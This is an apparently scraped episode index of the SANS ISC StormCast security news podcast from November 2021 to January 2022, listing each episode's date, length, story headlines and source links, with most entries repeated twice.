McAfee Phishing Campaign with a Nice Fake Scan https://isc.sans.edu/forums/diary/McAfee+Phishing+Campaign+with+a+Nice+Fake+Scan/28208/ Trend Micro Apex One Patch https://success.trendmicro.com/solution/000289996 E-commerce Bots Using Cheap Domain Registration Services https://threatpost.com/ecommerce-bots-domain-registration-account-fraud/177305/ iOS Homekit DoS Vulnerability https://trevorspiniolas.com/doorlock/doorlock.html
1/4/20225 minutes, 38 seconds
Episode Artwork

ISC StormCast for Monday, January 3rd, 2022

Exchange Server Year 2022 Bug https://isc.sans.edu/forums/diary/Exchange+Server+Email+Trapped+in+Transport+Queues/28204/ https://techcommunity.microsoft.com/t5/exchange-team-blog/email-stuck-in-exchange-on-premises-transport-queues/ba-p/3049447 Agent Tesla Updates https://isc.sans.edu/forums/diary/Agent+Tesla+Updates+SMTP+Data+Exfiltration+Technique/28190/ https://isc.sans.edu/forums/diary/Do+you+want+your+Agent+Tesla+in+the+300+MB+or+8+kB+package/28202/ Forensics Issues and Techniques to Improve Security in SSD with Flex Capacity Feature https://arxiv.org/ftp/arxiv/papers/2112/2112.13923.pdf iLO Bleed Attack https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/
1/3/20227 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, January 3rd, 2022

Exchange Server Year 2022 Bug https://isc.sans.edu/forums/diary/Exchange+Server+Email+Trapped+in+Transport+Queues/28204/ https://techcommunity.microsoft.com/t5/exchange-team-blog/email-stuck-in-exchange-on-premises-transport-queues/ba-p/3049447 Agent Tesla Updates https://isc.sans.edu/forums/diary/Agent+Tesla+Updates+SMTP+Data+Exfiltration+Technique/28190/ https://isc.sans.edu/forums/diary/Do+you+want+your+Agent+Tesla+in+the+300+MB+or+8+kB+package/28202/ Forensics Issues and Techniques to Improve Security in SSD with Flex Capacity Feature https://arxiv.org/ftp/arxiv/papers/2112/2112.13923.pdf iLO Bleed Attack https://threats.amnpardaz.com/en/2021/12/28/implant-arm-ilobleed-a/
1/3/20227 minutes, 35 seconds
Episode Artwork

ISC StormCast for Thursday, December 30th, 2021

Log4j 2 Security Vulnerabilities Update Guide https://isc.sans.edu/forums/diary/Log4j+2+Security+Vulnerabilities+Update+Guide/28188/ Microsoft Defender Log4j False Positives https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-log4j-scanner-triggers-false-positive-alerts/ T-Mobile SIM Swapping Alerts https://www.bleepingcomputer.com/news/security/t-mobile-says-new-data-breach-caused-by-sim-swap-attacks/ Fisher Price Bluetooth Phone Privcy Flaw https://www.pentestpartners.com/security-blog/audio-bugging-with-the-fisher-price-chatter-bluetooth-telephone/
12/30/20214 minutes, 10 seconds
Episode Artwork

ISC StormCast for Thursday, December 30th, 2021

Log4j 2 Security Vulnerabilities Update Guide https://isc.sans.edu/forums/diary/Log4j+2+Security+Vulnerabilities+Update+Guide/28188/ Microsoft Defender Log4j False Positives https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-log4j-scanner-triggers-false-positive-alerts/ T-Mobile SIM Swapping Alerts https://www.bleepingcomputer.com/news/security/t-mobile-says-new-data-breach-caused-by-sim-swap-attacks/ Fisher Price Bluetooth Phone Privcy Flaw https://www.pentestpartners.com/security-blog/audio-bugging-with-the-fisher-price-chatter-bluetooth-telephone/
12/30/20214 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, December 29th, 2021

Log4j Vulnerablity CVE-2021-44832 https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832 LotL Classifiers https://isc.sans.edu/forums/diary/LotL+Classifier+tests+for+shells+exfil+and+miners/28184/ LastPass Credential Stuffing https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/
12/29/20214 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, December 29th, 2021

Log4j Vulnerablity CVE-2021-44832 https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832 LotL Classifiers https://isc.sans.edu/forums/diary/LotL+Classifier+tests+for+shells+exfil+and+miners/28184/ LastPass Credential Stuffing https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/
12/29/20214 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, December 28th, 2021

Attackers are Abusing MSBuild to Evade Defenses and Implant Cobalt Strike Beacons https://isc.sans.edu/forums/diary/Attackers+are+abusing+MSBuild+to+evade+defenses+and+implant+Cobalt+Strike+beacons/28180/ Bypassing File Quarantine, Gatekeeper and Notarization Requirements https://objective-see.com/blog/blog_0x6A.html Spider-Miner: Trojanized Version of Spiderman No Way Home https://blog.reasonlabs.com/2021/12/23/spider-miner-with-great-power-comes-great-problems/
12/28/20214 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, December 28th, 2021

Attackers are Abusing MSBuild to Evade Defenses and Implant Cobalt Strike Beacons https://isc.sans.edu/forums/diary/Attackers+are+abusing+MSBuild+to+evade+defenses+and+implant+Cobalt+Strike+beacons/28180/ Bypassing File Quarantine, Gatekeeper and Notarization Requirements https://objective-see.com/blog/blog_0x6A.html Spider-Miner: Trojanized Version of Spiderman No Way Home https://blog.reasonlabs.com/2021/12/23/spider-miner-with-great-power-comes-great-problems/
12/28/20214 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, December 27th, 2021

Log4j/Log4Shell and Cloud Internal Meta Data Services https://isc.sans.edu/forums/diary/log4shell+and+cloud+provider+internal+meta+data+services+IMDS/28168/ https://isc.sans.edu/forums/diary/Defending+Cloud+IMDS+Against+log4shell+and+more/28170/ Log4j/Log4Shell Pushing Crypto Miner https://isc.sans.edu/forums/diary/Example+of+how+attackers+are+trying+to+push+crypto+miners+via+Log4Shell/28172/ Microsoft Vulnerable and Malicious Driver Reporting Center https://www.microsoft.com/security/blog/2021/12/08/improve-kernel-security-with-the-new-microsoft-vulnerable-and-malicious-driver-reporting-center/ Azure Source Code Leak https://blog.wiz.io/azure-app-service-source-code-leak/
12/27/20215 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, December 27th, 2021

Log4j/Log4Shell and Cloud Internal Meta Data Services https://isc.sans.edu/forums/diary/log4shell+and+cloud+provider+internal+meta+data+services+IMDS/28168/ https://isc.sans.edu/forums/diary/Defending+Cloud+IMDS+Against+log4shell+and+more/28170/ Log4j/Log4Shell Pushing Crypto Miner https://isc.sans.edu/forums/diary/Example+of+how+attackers+are+trying+to+push+crypto+miners+via+Log4Shell/28172/ Microsoft Vulnerable and Malicious Driver Reporting Center https://www.microsoft.com/security/blog/2021/12/08/improve-kernel-security-with-the-new-microsoft-vulnerable-and-malicious-driver-reporting-center/ Azure Source Code Leak https://blog.wiz.io/azure-app-service-source-code-leak/
12/27/20215 minutes, 46 seconds
Episode Artwork

ISC StormCast for Thursday, December 23rd, 2021

Forensics Challenge Solution https://isc.sans.edu/forums/diary/December+2021+Forensic+Contest+Answers+and+Analysis/28160/ CAB-less 40444 https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/ Ellume COVID Home Test Weakness https://github.com/FSecureLABS/Ellume-COVID-Test_Research-Files
12/23/20214 minutes
Episode Artwork

ISC StormCast for Thursday, December 23rd, 2021

Forensics Challenge Solution https://isc.sans.edu/forums/diary/December+2021+Forensic+Contest+Answers+and+Analysis/28160/ CAB-less 40444 https://news.sophos.com/en-us/2021/12/21/attackers-test-cab-less-40444-exploit-in-a-dry-run/ Ellume COVID Home Test Weakness https://github.com/FSecureLABS/Ellume-COVID-Test_Research-Files
12/23/20214 minutes
Episode Artwork

ISC StormCast for Wednesday, December 22nd, 2021

More Undetected PowerShell Droppers https://isc.sans.edu/forums/diary/More+Undetected+PowerShell+Dropper/28158/ Apache Patches https://httpd.apache.org/security/vulnerabilities_24.html Auerswald COMpact Multiple Backdoors https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-007/-auerswald-compact-multiple-backdoors Vulnerabilities in Garrett Metal Detectors https://blog.talosintelligence.com/2021/12/vuln-spotlight-garrett-metal-detector.html#more
12/22/20214 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, December 22nd, 2021

More Undetected PowerShell Droppers https://isc.sans.edu/forums/diary/More+Undetected+PowerShell+Dropper/28158/ Apache Patches https://httpd.apache.org/security/vulnerabilities_24.html Auerswald COMpact Multiple Backdoors https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-007/-auerswald-compact-multiple-backdoors Vulnerabilities in Garrett Metal Detectors https://blog.talosintelligence.com/2021/12/vuln-spotlight-garrett-metal-detector.html#more
12/22/20214 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, December 21st, 2021

PowerPoint Atachments: Agent Tesla and Code Reuse in Malware https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/ VMWare Workspace ONE Patch / log4j status https://www.vmware.com/security/advisories.html Attacks Against Building Automation https://limessecurity.com/en/knxlock/
12/21/20215 minutes, 55 seconds
Episode Artwork

ISC StormCast for Tuesday, December 21st, 2021

PowerPoint Atachments: Agent Tesla and Code Reuse in Malware https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/ VMWare Workspace ONE Patch / log4j status https://www.vmware.com/security/advisories.html Attacks Against Building Automation https://limessecurity.com/en/knxlock/
12/21/20215 minutes, 55 seconds
Episode Artwork

ISC StormCast for Monday, December 20th, 2021

Disaster Recovery Automation Using Public DNS APIs https://isc.sans.edu/forums/diary/DR+Automation+Using+Public+DNS+APIs/28146/ Office 2021: VBA Project Version https://isc.sans.edu/forums/diary/Office+2021+VBA+Project+Version/28150/ Log4j Updates https://www.blumira.com/analysis-log4shell-local-trigger/ https://logging.apache.org/log4j/2.x/security.html
12/20/20216 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, December 20th, 2021

Disaster Recovery Automation Using Public DNS APIs https://isc.sans.edu/forums/diary/DR+Automation+Using+Public+DNS+APIs/28146/ Office 2021: VBA Project Version https://isc.sans.edu/forums/diary/Office+2021+VBA+Project+Version/28150/ Log4j Updates https://www.blumira.com/analysis-log4shell-local-trigger/ https://logging.apache.org/log4j/2.x/security.html
12/20/20216 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, December 17th, 2021

How the "Contact Forms" Campaign Tricks People https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/ Bluetooth Used to Extract WiFi Secrets https://arxiv.org/pdf/2112.05719.pdf Lenovo Privilege Escalation Vulnerability https://support.lenovo.com/cy/en/product_security/len-75210 https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/ Log4j Updates https://github.com/cisagov/log4j-affected-db https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021 https://twitter.com/sans_isc/status/1471611522694717445
12/17/20217 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, December 17th, 2021

How the "Contact Forms" Campaign Tricks People https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/ Bluetooth Used to Extract WiFi Secrets https://arxiv.org/pdf/2112.05719.pdf Lenovo Privilege Escalation Vulnerability https://support.lenovo.com/cy/en/product_security/len-75210 https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/ Log4j Updates https://github.com/cisagov/log4j-affected-db https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+December+2021 https://twitter.com/sans_isc/status/1471611522694717445
12/17/20217 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, December 16th, 2021

Undetected Powershell Backdoor https://isc.sans.edu/forums/diary/Simple+but+Undetected+PowerShell+Backdoor/28138/ Adobe Security Updates https://helpx.adobe.com/security.html Remote Deserialization Bug in Microsoft RDP Client Through Smart Card Extension https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/ Webkit Bug Exploitable in PS4 https://arstechnica.com/gaming/2021/12/new-ps4-homebrew-exploit-points-to-similar-ps5-hacks-to-come/
12/16/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, December 16th, 2021

Undetected Powershell Backdoor https://isc.sans.edu/forums/diary/Simple+but+Undetected+PowerShell+Backdoor/28138/ Adobe Security Updates https://helpx.adobe.com/security.html Remote Deserialization Bug in Microsoft RDP Client Through Smart Card Extension https://thalium.github.io/blog/posts/deserialization-bug-through-rdp-smart-card-extension/ Webkit Bug Exploitable in PS4 https://arstechnica.com/gaming/2021/12/new-ps4-homebrew-exploit-points-to-similar-ps5-hacks-to-come/
12/16/20215 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, December 15th, 2021

Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+December+2021+Patch+Tuesday/28132/ Log4j Updates https://isc.sans.edu/forums/diary/Log4j+2150+and+previously+suggested+mitigations+may+not+be+enough/28134/ Log4j Scanner https://github.com/dtact/divd-2021-00038--log4j-scanner Apple Updates https://support.apple.com/en-us/HT201222
12/15/20215 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, December 15th, 2021

Microsoft Patches https://isc.sans.edu/forums/diary/Microsoft+December+2021+Patch+Tuesday/28132/ Log4j Updates https://isc.sans.edu/forums/diary/Log4j+2150+and+previously+suggested+mitigations+may+not+be+enough/28134/ Log4j Scanner https://github.com/dtact/divd-2021-00038--log4j-scanner Apple Updates https://support.apple.com/en-us/HT201222
12/15/20215 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, December 14th, 2021

Log4Shell Becoming Part of the Day to Day Grind https://isc.sans.edu/forums/diary/Log4Shell+exploited+to+implant+coin+miners/28124/ https://www.youtube.com/watch?v=oC2PZB5D3Ys Google Chrome Update https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html Malicious PyPi Packages https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2
12/14/20215 minutes, 7 seconds
Episode Artwork

ISC StormCast for Tuesday, December 14th, 2021

Log4Shell Becoming Part of the Day to Day Grind https://isc.sans.edu/forums/diary/Log4Shell+exploited+to+implant+coin+miners/28124/ https://www.youtube.com/watch?v=oC2PZB5D3Ys Google Chrome Update https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop_13.html Malicious PyPi Packages https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2
12/14/20215 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, December 13th, 2021

Remote Code Execution in log4j2 https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/ Log4j Zero Day https://www.lunasec.io/docs/blog/log4j-zero-day/ Log4j2/Log4Shell Followup: What we see and how to defend and how to access our data https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/ Log4Shell Vendor Bulletins https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
12/13/20217 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, December 13th, 2021

Remote Code Execution in log4j2 https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/ Log4j Zero Day https://www.lunasec.io/docs/blog/log4j-zero-day/ Log4j2/Log4Shell Followup: What we see and how to defend and how to access our data https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/ Log4Shell Vendor Bulletins https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
12/13/20217 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, December 10th, 2021

Phishing Direct Messages via Discord https://isc.sans.edu/forums/diary/Phishing+Direct+Messages+via+Discord/28114/ Vulnerable Microtik Routers https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/ log4j RCE 0-day https://www.lunasec.io/docs/blog/log4j-zero-day/ Sonicwall SMA 100 Patch https://www.sonicwall.com/support/product-notification/product-security-notice-sma-100-series-vulnerability-patches-q4-2021/211201154715443/
12/10/20216 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, December 10th, 2021

Phishing Direct Messages via Discord https://isc.sans.edu/forums/diary/Phishing+Direct+Messages+via+Discord/28114/ Vulnerable Microtik Routers https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/ log4j RCE 0-day https://www.lunasec.io/docs/blog/log4j-zero-day/ Sonicwall SMA 100 Patch https://www.sonicwall.com/support/product-notification/product-security-notice-sma-100-series-vulnerability-patches-q4-2021/211201154715443/
12/10/20216 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, December 9th, 2021

December 2021 Forensic Challenge https://isc.sans.edu/forums/diary/December+2021+Forensic+Challenge/28108/ Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attacks https://www.proofpoint.com/us/blog/cloud-security/microsoft-and-github-oauth-implementation-vulnerabilities-lead-redirection Android Patch Day https://source.android.com/security/bulletin/2021-12-01?hl=en
12/9/20215 minutes, 30 seconds
Episode Artwork

ISC StormCast for Thursday, December 9th, 2021

December 2021 Forensic Challenge https://isc.sans.edu/forums/diary/December+2021+Forensic+Challenge/28108/ Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attacks https://www.proofpoint.com/us/blog/cloud-security/microsoft-and-github-oauth-implementation-vulnerabilities-lead-redirection Android Patch Day https://source.android.com/security/bulletin/2021-12-01?hl=en
12/9/20215 minutes, 30 seconds
Episode Artwork

ISC StormCast for Wednesday, December 8th, 2021

Webshells, Webshells everywhere! https://isc.sans.edu/forums/diary/Webshells+Webshells+everywhere/28106/ AWS Outage https://status.aws.amazon.com Misconfigured Kafdrop Puts Companies' Apache Kafka Completely Exposed https://spectralops.io/blog/misconfigured-kafdrop-puts-companies-apache-kafka-completely-exposed/ Windows 10 RCE: The exploit is in the link https://positive.security/blog/ms-officecmd-rce XSinator.com: From a Formal Model to the Automatic Evaluation of Cross-Site Leaks in Web Browsers https://xsinator.com/paper.pdf
12/8/20215 minutes, 37 seconds
Episode Artwork

ISC StormCast for Wednesday, December 8th, 2021

Webshells, Webshells everywhere! https://isc.sans.edu/forums/diary/Webshells+Webshells+everywhere/28106/ AWS Outage https://status.aws.amazon.com Misconfigured Kafdrop Puts Companies' Apache Kafka Completely Exposed https://spectralops.io/blog/misconfigured-kafdrop-puts-companies-apache-kafka-completely-exposed/ Windows 10 RCE: The exploit is in the link https://positive.security/blog/ms-officecmd-rce XSinator.com: From a Formal Model to the Automatic Evaluation of Cross-Site Leaks in Web Browsers https://xsinator.com/paper.pdf
12/8/20215 minutes, 37 seconds
Episode Artwork

ISC StormCast for Tuesday, December 7th, 2021

The Importance of Out of Band Networks https://isc.sans.edu/forums/diary/The+Importance+of+OutofBand+Networks/28102/ Kaseya Unitrends Backup Appliance Updates https://helpdesk.kaseya.com/hc/en-gb/articles/4412762258961 Is KAX17 Performing De-Anonymization Attacks Against Tor Users? https://nusenu.medium.com/is-kax17-performing-de-anonymization-attacks-against-tor-users-42e566defce8 Google Chrome Update No 0-Days https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop.html
12/7/20215 minutes, 30 seconds
Episode Artwork

ISC StormCast for Tuesday, December 7th, 2021

The Importance of Out of Band Networks https://isc.sans.edu/forums/diary/The+Importance+of+OutofBand+Networks/28102/ Kaseya Unitrends Backup Appliance Updates https://helpdesk.kaseya.com/hc/en-gb/articles/4412762258961 Is KAX17 Performing De-Anonymization Attacks Against Tor Users? https://nusenu.medium.com/is-kax17-performing-de-anonymization-attacks-against-tor-users-42e566defce8 Google Chrome Update No 0-Days https://chromereleases.googleblog.com/2021/12/stable-channel-update-for-desktop.html
12/7/20215 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, December 6th, 2021

The UPX Packer will never die https://isc.sans.edu/forums/diary/The+UPX+Packer+Will+Never+Die/28096/ Survey of Airgap Attacks https://www.welivesecurity.com/2021/12/01/jumping-air-gap-15-years-nation-state-effort/ Ubiquity Victim of Insider Extortion https://www.justice.gov/usao-sdny/pr/former-employee-technology-company-charged-stealing-confidential-data-and-extorting
12/6/20215 minutes, 22 seconds
Episode Artwork

ISC StormCast for Monday, December 6th, 2021

The UPX Packer will never die https://isc.sans.edu/forums/diary/The+UPX+Packer+Will+Never+Die/28096/ Survey of Airgap Attacks https://www.welivesecurity.com/2021/12/01/jumping-air-gap-15-years-nation-state-effort/ Ubiquity Victim of Insider Extortion https://www.justice.gov/usao-sdny/pr/former-employee-technology-company-charged-stealing-confidential-data-and-extorting
12/6/20215 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, December 3rd, 2021

TA551 (Shathak) Pushes IcedID (Bokbot) https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/ pip-audit scanning Python packages for known vulnerabilities https://pypi.org/project/pip-audit/ Wifi Router Flaws https://www.iot-inspector.com/blog/router-security-check-2021/ SANS Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge/
12/3/202114 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, December 3rd, 2021

TA551 (Shathak) Pushes IcedID (Bokbot) https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/ pip-audit scanning Python packages for known vulnerabilities https://pypi.org/project/pip-audit/ Wifi Router Flaws https://www.iot-inspector.com/blog/router-security-check-2021/ SANS Holiday Hack Challenge https://www.sans.org/mlp/holiday-hack-challenge/
12/3/202114 minutes, 23 seconds
Episode Artwork

ISC StormCast for Thursday, December 2nd, 2021

Info-Stealer Using webhook.site to Exfiltrate Data https://isc.sans.edu/forums/diary/InfoStealer+Using+webhooksite+to+Exfiltrate+Data/28088/ Mozilla NSS Library Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=2237 EwDoor Botnet is Attacking AT&T Customers https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/ JAMF Pro 10.32 Patch https://community.jamf.com/t5/jamf-pro/what-s-new-in-jamf-pro-10-32-release/m-p/246505
12/2/20216 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, December 2nd, 2021

Info-Stealer Using webhook.site to Exfiltrate Data https://isc.sans.edu/forums/diary/InfoStealer+Using+webhooksite+to+Exfiltrate+Data/28088/ Mozilla NSS Library Vulnerability https://bugs.chromium.org/p/project-zero/issues/detail?id=2237 EwDoor Botnet is Attacking AT&T Customers https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/ JAMF Pro 10.32 Patch https://community.jamf.com/t5/jamf-pro/what-s-new-in-jamf-pro-10-32-release/m-p/246505
12/2/20216 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, December 1st, 2021

Hunting for PHPUnit Installed via Composer https://isc.sans.edu/forums/diary/Hunting+for+PHPUnit+Installed+via+Composer/28084/ Microsoft Defender Scares Admins with Emotet False Positivies https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-scares-admins-with-emotet-false-positives/ Printing Shellz HP Printer Vulnerabilities https://blog.f-secure.com/hp-printer-vulnerabilities/?_ga=2.125707850.1160056027.1638325485-2056233716.1638325485 Unpatched Local Privilege Escalation in Mobile Device Management Service https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html
12/1/20216 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, December 1st, 2021

Hunting for PHPUnit Installed via Composer https://isc.sans.edu/forums/diary/Hunting+for+PHPUnit+Installed+via+Composer/28084/ Microsoft Defender Scares Admins with Emotet False Positivies https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-scares-admins-with-emotet-false-positives/ Printing Shellz HP Printer Vulnerabilities https://blog.f-secure.com/hp-printer-vulnerabilities/?_ga=2.125707850.1160056027.1638325485-2056233716.1638325485 Unpatched Local Privilege Escalation in Mobile Device Management Service https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html
12/1/20216 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, November 30th, 2021

Wireshark 3.6.0 Released https://isc.sans.edu/forums/diary/Wireshark+360+Released/28076/ Google Cloud Security Report https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf Zoom Patch https://explore.zoom.us/en/trust/security/security-bulletin/ Slack DNSSEC Experience Reports https://slack.engineering/what-happened-during-slacks-dnssec-rollout/
11/30/20215 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, November 30th, 2021

Wireshark 3.6.0 Released https://isc.sans.edu/forums/diary/Wireshark+360+Released/28076/ Google Cloud Security Report https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf Zoom Patch https://explore.zoom.us/en/trust/security/security-bulletin/ Slack DNSSEC Experience Reports https://slack.engineering/what-happened-during-slacks-dnssec-rollout/
11/30/20215 minutes, 25 seconds
Episode Artwork

ISC StormCast for Monday, November 29th, 2021

Phishing Pages Hiding Itself Using Dynamically Adjusted IP Based Allow List https://isc.sans.edu/forums/diary/Phishing+page+hiding+itself+using+dynamically+adjusted+IPbased+allow+list/28070/ Trickbot Phishing Checks Screen Resolution to Evade Researchers https://www.bleepingcomputer.com/news/security/trickbot-phishing-checks-screen-resolution-to-evade-researchers/ QNAP QVR Patch https://www.qnap.com/de-de/security-advisory/qsa-21-51 CronRAT Malware Hiding in cron https://sansec.io/research/cronrat
11/29/20216 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, November 29th, 2021

Phishing Pages Hiding Itself Using Dynamically Adjusted IP Based Allow List https://isc.sans.edu/forums/diary/Phishing+page+hiding+itself+using+dynamically+adjusted+IPbased+allow+list/28070/ Trickbot Phishing Checks Screen Resolution to Evade Researchers https://www.bleepingcomputer.com/news/security/trickbot-phishing-checks-screen-resolution-to-evade-researchers/ QNAP QVR Patch https://www.qnap.com/de-de/security-advisory/qsa-21-51 CronRAT Malware Hiding in cron https://sansec.io/research/cronrat
11/29/20216 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, November 24th, 2021

YARA Rule for OOXML Maldocs: Less False Positives https://isc.sans.edu/forums/diary/YARA+Rule+for+OOXML+Maldocs+Less+False+Positives/28066/ Zero-Day Windows Installer Exploit https://www.bleepingcomputer.com/news/security/malware-now-trying-to-exploit-new-windows-installer-zero-day/ VMWare VCenter Vulnerability and Patch https://www.vmware.com/security/advisories/VMSA-2021-0027.html
11/24/20213 minutes, 13 seconds
Episode Artwork

ISC StormCast for Wednesday, November 24th, 2021

YARA Rule for OOXML Maldocs: Less False Positives https://isc.sans.edu/forums/diary/YARA+Rule+for+OOXML+Maldocs+Less+False+Positives/28066/ Zero-Day Windows Installer Exploit https://www.bleepingcomputer.com/news/security/malware-now-trying-to-exploit-new-windows-installer-zero-day/ VMWare VCenter Vulnerability and Patch https://www.vmware.com/security/advisories/VMSA-2021-0027.html
11/24/20213 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, November 23rd, 2021

Simple YARA Rules for Office Maldocs https://isc.sans.edu/forums/diary/Simple+YARA+Rules+for+Office+Maldocs/28062/ Retailers Urged to Patch Magento https://www.theregister.com/2021/11/22/ncsc_magento_updates_black_friday_reminder/ PoC of CVE-2021-42321: pop mspaint.exe on the target https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 BeC Via Exchange Flaws https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html Windows Priv. Escalation PoC https://github.com/klinix5/InstallerFileTakeOver PHP deserialize vulnerablity in CloudLinux Imunity360 https://blog.talosintelligence.com/2021/11/vulnerability-spotlight-php-deserialize.html
11/23/20214 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, November 23rd, 2021

Simple YARA Rules for Office Maldocs https://isc.sans.edu/forums/diary/Simple+YARA+Rules+for+Office+Maldocs/28062/ Retailers Urged to Patch Magento https://www.theregister.com/2021/11/22/ncsc_magento_updates_black_friday_reminder/ PoC of CVE-2021-42321: pop mspaint.exe on the target https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 BeC Via Exchange Flaws https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html Windows Priv. Escalation PoC https://github.com/klinix5/InstallerFileTakeOver PHP deserialize vulnerablity in CloudLinux Imunity360 https://blog.talosintelligence.com/2021/11/vulnerability-spotlight-php-deserialize.html
11/23/20214 minutes, 25 seconds
Episode Artwork

ISC StormCast for Monday, November 22nd, 2021

Hikvision Security Cameras Potentially Exposed to Remote Code Execution https://isc.sans.edu/forums/diary/Hikvision+Security+Cameras+Potentially+Exposed+to+Remote+Code+Execution/28056/ Detecting PAM Backdoors https://isc.sans.edu/forums/diary/Backdooring+PAM/28058/ Rusted Anchors: A National Client-Side View of Hidden Root CAs in the Web PKI Ecosystem https://dl.acm.org/doi/pdf/10.1145/3460120.3484768 CVE-2021-42306 CredManifest: App Registration Certificates Stored in Azure Active Directory https://www.netspi.com/blog/technical/cloud-penetration-testing/azure-cloud-vulnerability-credmanifest/
11/22/20215 minutes
Episode Artwork

ISC StormCast for Monday, November 22nd, 2021

